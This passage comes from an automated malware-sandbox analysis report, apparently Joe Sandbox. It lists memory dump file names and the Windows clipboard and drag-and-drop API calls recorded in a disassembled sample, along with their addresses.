    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
    • IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(00000001), ref: 00404096
      • Part of subcall function 00404080: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040409C
      • Part of subcall function 00404080: GlobalUnWire.KERNEL32(00000000), ref: 0040410F
      • Part of subcall function 00404080: CloseClipboard.USER32 ref: 0040411B
      • Part of subcall function 00404080: GlobalFix.KERNEL32(00000000), ref: 00404136
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404194
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,00000000), ref: 004041BA
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,000000FF,004987E9,00000000), ref: 00404207
      • Part of subcall function 00404080: DragQueryFile.SHELL32(00000000,00000000,00000000,000003E7), ref: 0040422D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GlobalUnWire.KERNEL32(00000000), ref: 004044DF
    • CloseClipboard.USER32 ref: 004044EC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd